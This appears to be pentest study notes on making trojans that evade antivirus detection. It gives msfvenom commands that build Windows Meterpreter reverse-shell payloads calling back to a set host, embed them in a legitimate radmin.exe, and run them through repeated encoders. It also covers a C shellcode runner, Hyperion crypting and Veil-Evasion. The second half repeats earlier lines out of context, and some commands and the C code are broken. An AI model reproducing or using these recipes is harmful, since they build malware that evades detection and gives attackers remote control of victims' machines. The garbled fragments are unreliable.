Trojans: Bypassing Anti-Virus Signature Detection
Techniques:
1- Binary Embedding
2- Metasploit Encoding
3- Multi-Encoding
4- Combining Tecnniques
5- Custom Compiling
6- Creating Shellcode
7- Hyperion
8- Veil
(1) Binary Embedding msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windowsbinaries/radmin.exe -k -f exe > radmin.exe
-x executable template
-k run the shellcode in a new thread
(2) Metasploit EncodingWe can also run our shellcode through an encoder to obfuscate it.
msfvenom -l encoders
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f exe > meterpreterencoded.exe
(3) Multi-Encodingmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f raw> meterpreterencoded.bin
msfvenom -p -f exe -a x86 –platform windows -e x86/bloxor -i 2 > meterpretermultiencoded.exe < meterpreterencoded.bin
(4) Combining Techniquesmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -x /usr/share/windows-binaries/radmin.exe -k -e x86/shikata_ga_nai -i 10 -f exe > radminencoded.exe
(5) Custom Compiling#include unsigned char
random[]=
unsigned char shellcode[]=
int main(void) {
((void (*)())shellcode)();
}
(6) Creating Shellcodemsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f c -e x86/shikata_ga_nai -i 5
Creating Randomness:
cat /dev/urandom | tr -dc A-Z-a-z-0-9 | head -c512
Compiling:
i586-mingw32msvc-gcc -o custommeterpreter.exe custommeterpreter.c
(7) HyperionEncrypts with AES encryption and throws away the key.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -f exe > meterpreter.exe
cd Hyperion-1.0/
wine ../hyperion ../meterpreter.exe bypassavhyperion.exe
(8) VeilFramework for using different techniques to bypass antivirus
cd Veil-Evasion-master
./Veil-Evasion.py
-k run the shellcode in a new thread
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.20.9 LPORT=2345 -e x86/shikata_ga_nai -i 10 -f exe > meterpreterencoded.exe
msfvenom -p -f exe -a x86 –platform windows -e x86/bloxor -i 2 > meterpretermultiencoded.exe < meterpreterencoded.bin
random[]=
unsigned char shellcode[]=
((void (*)())shellcode)();
}
cat /dev/urandom | tr -dc A-Z-a-z-0-9 | head -c512
i586-mingw32msvc-gcc -o custommeterpreter.exe custommeterpreter.c
wine ../hyperion ../meterpreter.exe bypassavhyperion.exe
./Veil-Evasion.py